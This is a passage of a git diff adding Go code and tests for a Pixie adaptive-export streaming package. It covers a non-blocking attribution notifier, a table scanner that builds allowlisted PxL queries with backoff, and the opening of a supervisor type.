+ n.Submit(activeset.Key{Namespace: namespace, Pod: pod}, tEnd)
+}
+
+// RemoveFromController matches controller.Config.OnPrune signature.
+func (n *AttributionNotifier) RemoveFromController(namespace, pod string) {
+ n.SubmitRemove(activeset.Key{Namespace: namespace, Pod: pod})
+}
+
+// (Backpressure logging was deliberately not wired internally to
+// avoid coupling the notifier to a particular log cadence. Callers
+// observe via DroppedCount() and log on their own schedule.)
diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go
new file mode 100644
index 00000000000..7ae020bab8d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go
@@ -0,0 +1,220 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "sync"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// TestNotifier_NeverBlocksCaller — the synchronous callback path
+// (controller.handle → cfg.OnAttribution → activeset.Upsert) must
+// not block the caller even when the consuming end is slow.
+//
+// The current design exposes Upsert as a fast in-mem mutation, but
+// once we wire a Notifier between controller and ActiveSet, the
+// Notifier MUST guarantee bounded latency on the producer side.
+func TestNotifier_CallerReturnsImmediatelyEvenIfConsumerStalls(t *testing.T) {
+ set := activeset.New()
+ // Deliberately no ctx / Run here — we want a stalled consumer
+ // to prove producer never blocks.
+
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 32})
+ // Start the goroutine but DON'T let it drain — simulate stall
+ // by NOT calling Run. The producer-side call MUST still return.
+ // (We never start n.Run here on purpose.)
+
+ start := time.Now()
+ for i := 0; i < 1000; i++ {
+ // Submit MORE events than the buffer can hold.
+ n.Submit(activeset.Key{Pod: "p"}, time.Now().Add(time.Minute))
+ }
+ elapsed := time.Since(start)
+ if elapsed > 100*time.Millisecond {
+ t.Fatalf("1000 Submit() calls took %v — producer is blocking on a stalled consumer", elapsed)
+ }
+ // Sanity: at least some events were dropped (since we never started Run).
+ if n.DroppedCount() == 0 {
+ t.Fatalf("expected DroppedCount > 0 with no consumer, got 0")
+ }
+}
+
+// TestNotifier_DeliversEventsWhenConsumerKeepsUp — happy path.
+// We submit slowly enough vs a generously-sized buffer that the
+// consumer trivially keeps up. Tests the basic delivery contract
+// without measuring the buffer's drop semantics (that's covered by
+// TestNotifier_DroppedCountAccurate).
+func TestNotifier_DeliversEventsWhenConsumerKeepsUp(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+
+ // Buffer >> burst so no drops are forced; throttle the submit
+ // loop so the consumer gets scheduled between sends.
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 1024})
+ go n.Run(ctx)
+
+ tEnd := time.Now().Add(5 * time.Minute)
+ for i := 0; i < 50; i++ {
+ n.Submit(activeset.Key{Pod: "p" + string(rune('a'+(i%26)))}, tEnd)
+ if i%5 == 0 {
+ // Yield so the consumer can drain — production callers
+ // (controller.handle) naturally have inter-event gaps.
+ time.Sleep(time.Microsecond)
+ }
+ }
+ // Wait until consumer drains.
+ deadline := time.Now().Add(500 * time.Millisecond)
+ for set.Size() < 26 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 26 {
+ t.Fatalf("expected 26 distinct pods, got %d", set.Size())
+ }
+ if n.DroppedCount() != 0 {
+ t.Fatalf("expected 0 drops with buffer>>burst, got %d", n.DroppedCount())
+ }
+}
+
+// TestNotifier_SubmitConcurrentlySafe — the producer path must be
+// safe under concurrent callers (controller has only one goroutine
+// in handle, but the contract should be conservative).
+func TestNotifier_SubmitConcurrentlySafe(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 256})
+ go n.Run(ctx)
+
+ var wg sync.WaitGroup
+ for i := 0; i < 50; i++ {
+ i := i
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ for j := 0; j < 20; j++ {
+ n.Submit(activeset.Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute))
+ }
+ }()
+ }
+ wg.Wait()
+ // Allow drain.
+ deadline := time.Now().Add(500 * time.Millisecond)
+ for set.Size() < 26 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() == 0 {
+ t.Fatalf("no pods landed in ActiveSet under concurrent Submit")
+ }
+}
+
+// TestNotifier_RunStopsOnCtxCancel — must drain + return promptly
+// on ctx cancellation.
+func TestNotifier_RunStopsOnCtxCancel(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 16})
+ done := make(chan struct{})
+ go func() { n.Run(ctx); close(done) }()
+
+ cancel()
+ select {
+ case <-done:
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("Run did not return within 500ms of ctx cancel")
+ }
+}
+
+// TestNotifier_RemoveDeliveredAsRemoval — the Notifier must
+// distinguish Upsert vs Remove events.
+func TestNotifier_RemoveDeliveredAsRemoval(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4})
+ go n.Run(ctx)
+
+ k := activeset.Key{Pod: "p1"}
+ n.Submit(k, time.Now().Add(time.Minute))
+ // drain
+ deadline := time.Now().Add(300 * time.Millisecond)
+ for set.Size() == 0 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 1 {
+ t.Fatalf("upsert didn't land")
+ }
+ n.SubmitRemove(k)
+ deadline = time.Now().Add(300 * time.Millisecond)
+ for set.Size() == 1 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 0 {
+ t.Fatalf("remove didn't land")
+ }
+}
+
+// TestNotifier_DroppedCountAccurate — overflow accounting.
+func TestNotifier_DroppedCountAccurate(t *testing.T) {
+ set := activeset.New()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4})
+ // Don't run the consumer.
+ const submits = 100
+ for i := 0; i < submits; i++ {
+ n.Submit(activeset.Key{Pod: "p"}, time.Now())
+ }
+ if got := n.DroppedCount(); got < int64(submits-4-1) { // allow ±1 slack on buffer count
+ t.Fatalf("expected ~%d drops, got %d", submits-4, got)
+ }
+}
+
+// TestNotifier_HostPidEntriesAreFiltered — host-pid events (empty
+// Pod) cannot be streamed and must be dropped at the Notifier so the
+// ActiveSet never accumulates pod-less rows.
+func TestNotifier_HostPidEntriesAreFiltered(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 8})
+ go n.Run(ctx)
+ n.Submit(activeset.Key{Pod: ""}, time.Now().Add(time.Minute))
+ n.Submit(activeset.Key{Pod: "real"}, time.Now().Add(time.Minute))
+ deadline := time.Now().Add(300 * time.Millisecond)
+ for set.Size() < 1 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 1 {
+ t.Fatalf("expected 1 entry (only real), got %d", set.Size())
+ }
+ if n.FilteredCount() < 1 {
+ t.Fatalf("expected at least 1 filtered, got %d", n.FilteredCount())
+ }
+}
+
+// staticAtomicCheck — make sure Stats accessors don't panic on
+// a freshly-constructed notifier (no Run yet).
+func TestNotifier_StatsOnFreshInstance(t *testing.T) {
+ set := activeset.New()
+ n := NewAttributionNotifier(set, NotifierConfig{})
+ if n.DroppedCount() != 0 || n.FilteredCount() != 0 {
+ t.Fatalf("fresh notifier should report zero counters")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner.go b/src/vizier/services/adaptive_export/internal/streaming/scanner.go
new file mode 100644
index 00000000000..d77941e886e
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner.go
@@ -0,0 +1,357 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "fmt"
+ "strconv"
+ "strings"
+ "sync/atomic"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+)
+
+// Querier executes a PxL string against a vizier and returns the
+// resulting flat rows. Same shape as controller.PixieQuerier; kept
+// independently here to avoid an import cycle.
+type Querier interface {
+ Query(ctx context.Context, pxl string) ([]map[string]any, error)
+}
+
+// ScannerConfig tunes one TableScanner.
+type ScannerConfig struct {
+ // Table is the pixie observation table this scanner targets
+ // (e.g. "pgsql_events"). REQUIRED.
+ Table string
+
+ // QueryWindow is the `start_time` in the emitted PxL, e.g. "-60s".
+ // Must be longer than RefreshInterval + maximum expected query
+ // latency, otherwise rows in the gap between consecutive runs
+ // would be missed. 0 → -60s.
+ QueryWindow time.Duration
+
+ // RefreshInterval is the floor on time-between-PxL-submissions.
+ // A filter change can submit sooner; this prevents over-frequent
+ // submissions when the filter is stable. 0 → 30s.
+ RefreshInterval time.Duration
+
+ // QueryTimeout bounds one PxL call. 0 → 180s.
+ QueryTimeout time.Duration
+
+ // BackoffInitial / BackoffMax — exponential backoff on Querier
+ // errors. 0 → 1s / 30s.
+ BackoffInitial time.Duration
+ BackoffMax time.Duration
+
+ // Rec records per-pull read/submitted counts (ADAPTIVE_RECONCILE).
+ // nil → reconcile.Nop{} in defaulted() (instrument off).
+ Rec reconcile.Recorder
+
+ // Hostname is stamped on reconcile rows.
+ Hostname string
+}
+
+func (c ScannerConfig) defaulted() ScannerConfig {
+ if c.QueryWindow <= 0 {
+ c.QueryWindow = 60 * time.Second
+ }
+ if c.RefreshInterval <= 0 {
+ c.RefreshInterval = 30 * time.Second
+ }
+ if c.QueryTimeout <= 0 {
+ c.QueryTimeout = 180 * time.Second
+ }
+ if c.BackoffInitial <= 0 {
+ c.BackoffInitial = 1 * time.Second
+ }
+ if c.BackoffMax <= 0 {
+ c.BackoffMax = 30 * time.Second
+ }
+ if c.Rec == nil {
+ c.Rec = reconcile.Nop{}
+ }
+ return c
+}
+
+// TableScanner runs ONE PxL submission per refresh cycle for ONE
+// pixie table, with a pod allowlist drawn from an upstream Filter
+// channel. Output goes to a per-table BatchWriter.
+//
+// This is the rev-3 replacement for pushPixieRows' per-hash×per-table
+// fan-out. Goroutines created: 1 per TableScanner. Concurrency
+// against vizier-query-broker: 1 per scanner = N (number of tables).
+type TableScanner struct {
+ cfg ScannerConfig
+ querier Querier
+ writer *BatchWriter
+ filters <-chan Filter
+
+ currentFilter Filter
+
+ queries atomic.Int64
+ queryErr atomic.Int64
+ rowsIn atomic.Int64
+ skipped atomic.Int64
+}
+
+// NewScanner wires a scanner. filters is the channel returned by
+// FilterUpdater.Subscribe.
+func NewScanner(cfg ScannerConfig, querier Querier, writer *BatchWriter, filters <-chan Filter) *TableScanner {
+ return &TableScanner{
+ cfg: cfg.defaulted(),
+ querier: querier,
+ writer: writer,
+ filters: filters,
+ }
+}
+
+// Run owns one goroutine. Loops:
+//
+// 1. Wait for filter (initial) — block until first one arrives.
+// 2. Loop:
+// - If filter has no pods AND mode == Allowlist: skip query
+// entirely (the whole purpose: empty allowlist = no work).
+// - Else: build PxL, query, push rows to writer.
+// - Sleep RefreshInterval OR until filter changes.
+// 3. Backoff on Querier errors.
+func (s *TableScanner) Run(ctx context.Context) {
+ // 1. Initial filter.
+ select {
+ case f, ok := <-s.filters:
+ if !ok {
+ return
+ }
+ s.currentFilter = f
+ case <-ctx.Done():
+ return
+ }
+
+ backoff := s.cfg.BackoffInitial
+ resetBackoff := func() { backoff = s.cfg.BackoffInitial }
+ bumpBackoff := func() {
+ backoff *= 2
+ if backoff > s.cfg.BackoffMax {
+ backoff = s.cfg.BackoffMax
+ }
+ }
+
+ for {
+ if ctx.Err() != nil {
+ return
+ }
+
+ // Empty allowlist short-circuit: nothing to query.
+ if s.currentFilter.Mode == FilterModeAllowlist && len(s.currentFilter.Pods) == 0 {
+ s.skipped.Add(1)
+ // Diagnostic: an empty allowlist means the ActiveSet has no
+ // members — i.e. nothing has been steered into this AE yet.
+ // Logged so an operator can tell "empty ActiveSet → skipping"
+ // apart from "queried but the broker returned 0 rows" (the
+ // latter logs "query completed rows=0"). Naturally rate-limited:
+ // we block on the next filter immediately after.
+ log.WithFields(log.Fields{
+ "table": s.cfg.Table,
+ "version": s.currentFilter.Version,
+ }).Info("streaming.TableScanner: empty allowlist (ActiveSet has no steered pods) — skipping query until a filter with pods arrives")
+ // Wait for either: a new filter arrives, or ctx done.
+ select {
+ case <-ctx.Done():
+ return
+ case f, ok := <-s.filters:
+ if !ok {
+ return
+ }
+ s.currentFilter = f
+ }
+ continue
+ }
+
+ // 2. Build PxL + execute.
+ pxl := s.buildPxL(s.currentFilter)
+ winEnd := time.Now()
+ winStart := winEnd.Add(-s.cfg.QueryWindow)
+ qctx, cancel := context.WithTimeout(ctx, s.cfg.QueryTimeout)
+ rows, err := s.querier.Query(qctx, pxl)
+ cancel()
+ s.queries.Add(1)
+ if err != nil {
+ s.queryErr.Add(1)
+ s.cfg.Rec.Record(ctx, reconcile.Row{
+ TS: winEnd, Mode: "streaming", Table: s.cfg.Table,
+ WinStart: winStart, WinEnd: winEnd,
+ ReadCount: 0, WroteCount: 0, WriteErr: err.Error(),
+ Hostname: s.cfg.Hostname,
+ })
+ log.WithError(err).WithFields(log.Fields{
+ "table": s.cfg.Table,
+ "pods": len(s.currentFilter.Pods),
+ "mode": s.currentFilter.Mode,
+ "backoff": backoff,
+ }).Warn("streaming.TableScanner: query failed; backing off")
+ // Wait either backoff OR new filter (filter takes precedence).
+ select {
+ case <-ctx.Done():
+ return
+ case f, ok := <-s.filters:
+ if !ok {
+ return
+ }
+ s.currentFilter = f
+ resetBackoff()
+ case <-time.After(backoff):
+ bumpBackoff()
+ }
+ continue
+ }
+ resetBackoff()
+ s.rowsIn.Add(int64(len(rows)))
+
+ // 3. Hand off to writer.
+ submitted := 0
+ if len(rows) > 0 {
+ if s.writer.Submit(rows) {
+ submitted = len(rows)
+ }
+ }
+ s.cfg.Rec.Record(ctx, reconcile.Row{
+ TS: winEnd, Mode: "streaming", Table: s.cfg.Table,
+ WinStart: winStart, WinEnd: winEnd,
+ ReadCount: int64(len(rows)), WroteCount: int64(submitted),
+ Hostname: s.cfg.Hostname,
+ })
+ log.WithFields(log.Fields{
+ "table": s.cfg.Table,
+ "pods": len(s.currentFilter.Pods),
+ "mode": s.currentFilter.Mode,
+ "rows": len(rows),
+ "version": s.currentFilter.Version,
+ }).Info("streaming.TableScanner: query completed")
+
+ // 4. Sleep until refresh OR filter change.
+ select {
+ case <-ctx.Done():
+ return
+ case f, ok := <-s.filters:
+ if !ok {
+ return
+ }
+ s.currentFilter = f
+ case <-time.After(s.cfg.RefreshInterval):
+ }
+ }
+}
+
+// buildPxL renders the script for one query.
+// pxSetMaxRows raises Pixie's per-table result cap (default 10000) via the
+// query-broker's `#px:set` query flag, mirroring internal/pxl (queryfor.go /
+// compile.go). Without it the streaming/DX arm silently caps each pull at 10k
+// rows while the passthrough/ALL arm (which already emits this) does not — which
+// would UNDER-count DX and OVERSTATE the DX-vs-ALL volume reduction. Must be the
+// first line of the script (before `import px`).
+const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n"
+
+func (s *TableScanner) buildPxL(f Filter) string {
+ relStart := "-" + strconv.FormatInt(int64(s.cfg.QueryWindow/time.Second), 10) + "s"
+ var b strings.Builder
+ b.WriteString(pxSetMaxRows)
+ b.WriteString("import px\n")
+ b.WriteString("df = px.DataFrame(table='" + s.cfg.Table + "', start_time='" + relStart + "')\n")
+ b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+ b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+ if f.Mode == FilterModeAllowlist && len(f.Pods) > 0 {
+ // Allowlist clause. PxL syntax exploration (2026-05-17):
+ // - `or` between equalities → "Expected two arguments to 'or'"
+ // - `|` between equalities → "Operator '|' not handled"
+ // - `px.contains(s, p)` → SUBSTRING (not regex)
+ // - `px.regex_match(p, s)` → RE2 regex match (PxL UDF
+ // registered in carnot/funcs/builtins/regex_ops.cc)
+ // → use regex_match with an anchored alternation.
+ b.WriteString("df = df[px.regex_match('^(")
+ for i, k := range f.Pods {
+ if i > 0 {
+ b.WriteString("|")
+ }
+ b.WriteString(escapeRegex(escapePxL(k.Render())))
+ }
+ b.WriteString(")$', df.pod)]\n")
+ }
+ // Unfiltered mode: emit ALL pods on this node. The CH writer's
+ // downstream consumers can filter by joining adaptive_attribution.
+ b.WriteString("px.display(df, '" + s.cfg.Table + "')\n")
+ return b.String()
+}
+
+// ScannerStats — small monitoring helper.
+type ScannerStats struct {
+ Queries int64
+ Errors int64
+ RowsIn int64
+ Skipped int64
+}
+
+func (s *TableScanner) Stats() ScannerStats {
+ return ScannerStats{
+ Queries: s.queries.Load(),
+ Errors: s.queryErr.Load(),
+ RowsIn: s.rowsIn.Load(),
+ Skipped: s.skipped.Load(),
+ }
+}
+
+var pxlEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+func escapePxL(s string) string {
+ return pxlEscaper.Replace(s)
+}
+
+// escapeRegex defangs regex metacharacters in pod names. k8s pod names
+// are DNS-1123 (lowercase alphanumeric + hyphen) plus a "/" namespace
+// separator — none of these are regex meta — but we escape defensively
+// so a future rename rule that admits underscores or dots doesn't
+// produce a silently-broken filter.
+var regexEscaper = strings.NewReplacer(
+ `.`, `\.`,
+ `|`, `\|`,
+ `(`, `\(`,
+ `)`, `\)`,
+ `+`, `\+`,
+ `*`, `\*`,
+ `?`, `\?`,
+ `[`, `\[`,
+ `]`, `\]`,
+ `{`, `\{`,
+ `}`, `\}`,
+ `^`, `\^`,
+ `$`, `\$`,
+)
+
+func escapeRegex(s string) string {
+ return regexEscaper.Replace(s)
+}
+
+// Compile-time assert ActiveSet.Key is what we expect (the fmt import
+// would be unused if Render changed).
+var _ = fmt.Sprintf
+
+// Compile-time assert that activeset.Key.Render is the format used
+// above (sanity for refactors).
+var _ = (activeset.Key{}).Render
diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
new file mode 100644
index 00000000000..0e5a6b9ac1f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
@@ -0,0 +1,242 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "errors"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// fakeQuerier captures PxL strings and returns a canned row set.
+type fakeQuerier struct {
+ mu sync.Mutex
+ queries []string
+ rows []map[string]any
+}
+
+func (f *fakeQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
+ f.mu.Lock()
+ f.queries = append(f.queries, pxl)
+ f.mu.Unlock()
+ return f.rows, nil
+}
+
+// failingQuerier always returns err.
+type failingQuerier struct {
+ err error
+ mu sync.Mutex
+ hits int
+}
+
+func (f *failingQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
+ f.mu.Lock()
+ f.hits++
+ f.mu.Unlock()
+ return nil, f.err
+}
+
+// flipFlopQuerier alternates success / failure per call.
+type flipFlopQuerier struct {
+ mu sync.Mutex
+ idx int
+ results [][]map[string]any
+ failures []bool
+}
+
+func (f *flipFlopQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ i := f.idx % len(f.failures)
+ f.idx++
+ if f.failures[i] {
+ return nil, errors.New("simulated failure")
+ }
+ return f.results[i], nil
+}
+
+// fakeWriter counts WritePixieRows invocations.
+type fakeWriter struct {
+ count atomic.Int64
+}
+
+func (f *fakeWriter) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error {
+ f.count.Add(int64(len(rows)))
+ return nil
+}
+
+func TestScanner_BuildsPxLWithAllowlistOR(t *testing.T) {
+ cfg := ScannerConfig{Table: "pgsql_events"}.defaulted()
+ s := &TableScanner{cfg: cfg}
+ f := Filter{
+ Mode: FilterModeAllowlist,
+ Pods: []activeset.Key{
+ {Namespace: "n1", Pod: "a"},
+ {Namespace: "n2", Pod: "b"},
+ },
+ }
+ pxl := s.buildPxL(f)
+ if !strings.HasPrefix(pxl, "#px:set max_output_rows_per_table=1000000\n") {
+ t.Fatalf("pxl missing the #px:set cap flag (10k-cap fix); got:\n%s", pxl)
+ }
+ if !strings.Contains(pxl, "table='pgsql_events'") {
+ t.Fatalf("pxl missing table: %s", pxl)
+ }
+ if !strings.Contains(pxl, "n1/a") {
+ t.Fatalf("pxl missing first pod in regex: %s", pxl)
+ }
+ if !strings.Contains(pxl, "n2/b") {
+ t.Fatalf("pxl missing second pod in regex: %s", pxl)
+ }
+ if !strings.Contains(pxl, "px.regex_match") || !strings.Contains(pxl, "df.pod)") {
+ t.Fatalf("pxl missing px.regex_match call: %s", pxl)
+ }
+ if !strings.Contains(pxl, "^(") || !strings.Contains(pxl, ")$") {
+ t.Fatalf("pxl missing anchored alternation: %s", pxl)
+ }
+}
+
+func TestScanner_UnfilteredModeOmitsAllowlist(t *testing.T) {
+ cfg := ScannerConfig{Table: "http_events"}.defaulted()
+ s := &TableScanner{cfg: cfg}
+ f := Filter{Mode: FilterModeUnfiltered}
+ pxl := s.buildPxL(f)
+ if strings.Contains(pxl, "df.pod ==") {
+ t.Fatalf("unfiltered mode should not emit pod filter: %s", pxl)
+ }
+}
+
+func TestScanner_EmptyAllowlistSkipsQuery(t *testing.T) {
+ q := &fakeQuerier{rows: nil}
+ w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: time.Hour})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: nil} // empty
+ cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 100 * time.Millisecond}
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ st := sc.Stats()
+ if st.Queries != 0 {
+ t.Fatalf("expected 0 queries on empty allowlist, got %d", st.Queries)
+ }
+ if st.Skipped == 0 {
+ t.Fatalf("expected skipped > 0")
+ }
+}
+
+// TestScanner_BackoffOnRepeatedErrors — after a Query error, the
+// scanner must back off (NOT hot-loop). After K consecutive
+// failures, the per-retry interval must be ≥ a measurable threshold.
+func TestScanner_BackoffOnRepeatedErrors(t *testing.T) {
+ q := &failingQuerier{err: errors.New("simulated broker outage")}
+ w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 50 * time.Millisecond})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
+ cfg := ScannerConfig{
+ Table: "pgsql_events",
+ RefreshInterval: 100 * time.Second, // huge — backoff must dominate, not refresh
+ QueryTimeout: 100 * time.Millisecond,
+ BackoffInitial: 50 * time.Millisecond,
+ BackoffMax: 200 * time.Millisecond,
+ }
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 1*time.Second)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ st := sc.Stats()
+ // In 1 second with backoff = 50/100/200/200 → expected attempts ≤ ~10.
+ // Without backoff (hot-loop), we'd see thousands.
+ if st.Errors > 20 {
+ t.Fatalf("scanner appears to be hot-looping on errors: %d in 1s (expected ≤ 20)", st.Errors)
+ }
+ if st.Errors < 2 {
+ t.Fatalf("scanner did not retry after error: %d (expected ≥ 2)", st.Errors)
+ }
+}
+
+// TestScanner_BackoffResetsOnSuccess — once a query succeeds, the
+// backoff state must reset so the next failure waits BackoffInitial
+// (not BackoffMax).
+func TestScanner_BackoffResetsOnSuccess(t *testing.T) {
+ q := &flipFlopQuerier{
+ results: [][]map[string]any{
+ nil, // first call fails
+ {{"x": 1}},
+ nil, // third call fails again
+ },
+ failures: []bool{true, false, true},
+ }
+ w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 1 * time.Hour})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
+ cfg := ScannerConfig{
+ Table: "pgsql_events",
+ RefreshInterval: 10 * time.Millisecond,
+ QueryTimeout: 100 * time.Millisecond,
+ BackoffInitial: 50 * time.Millisecond,
+ BackoffMax: 400 * time.Millisecond,
+ }
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 250*time.Millisecond)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ st := sc.Stats()
+ // Without backoff reset, a stuck-at-Max scanner would hit fewer
+ // retries (waiting BackoffMax=400ms = 0 retries in 250ms after
+ // first error). With reset, success → 50ms → fail → 100ms etc.
+ // — more retries fit in the window.
+ //
+ // Concrete: after each "fail | success | fail | success ..." cycle,
+ // backoff stays at the initial value, so retries are FAST. We
+ // expect ≥ 3 queries and ≥ 2 errors in 250 ms.
+ if st.Queries < 3 {
+ t.Fatalf("scanner did fewer queries than expected; queries=%d errors=%d (backoff may not be resetting)", st.Queries, st.Errors)
+ }
+ if st.Errors < 2 {
+ t.Fatalf("expected ≥ 2 errors, got %d", st.Errors)
+ }
+}
+
+func TestScanner_QueriesOnNonEmptyFilter(t *testing.T) {
+ q := &fakeQuerier{rows: []map[string]any{{"time_": time.Now(), "pod": "n/p"}}}
+ fw := &fakeWriter{}
+ w := NewBatchWriter("pgsql_events", fw, WriterConfig{BatchEvery: 50 * time.Millisecond})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
+ cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 50 * time.Millisecond, QueryTimeout: 1 * time.Second}
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 300*time.Millisecond)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ if sc.Stats().Queries == 0 {
+ t.Fatalf("expected at least one query")
+ }
+ if fw.count.Load() == 0 {
+ t.Fatalf("writer received no rows; expected at least 1")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/supervisor.go b/src/vizier/services/adaptive_export/internal/streaming/supervisor.go
new file mode 100644
index 00000000000..8aca323aac2
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/supervisor.go
@@ -0,0 +1,95 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "sync"
+
+ log "github.com/sirupsen/logrus"
+)
+
+// Supervisor owns the lifecycle of N TableScanner + N BatchWriter
+// pairs (one pair per pixie table) plus the shared FilterUpdater.
+// Single entry point from main.go.
+//
+// Goroutine inventory at steady state:
+//
+// 1 FilterUpdater
+// N TableScanners (1 per pixie table)
+// N BatchWriters (1 per pixie table)
+// ──────────────────
+// 1 + 2N total
+//
+// For N=10 (current PushPixieTables count): 21 goroutines, constant
+// regardless of active hash count.
+type Supervisor struct {
+ updater *FilterUpdater
+ scanners []*TableScanner
+ writers []*BatchWriter
+ tables []string
+
+ wg sync.WaitGroup
+}
+
+// NewSupervisor wires up scanners + writers for the given table list.
+// One scanner + one writer per table. Each scanner gets its own
+// channel from the updater.
+func NewSupervisor(
+ updater *FilterUpdater,
+ querier Querier,
+ sink SinkWriter,
+ tables []string,
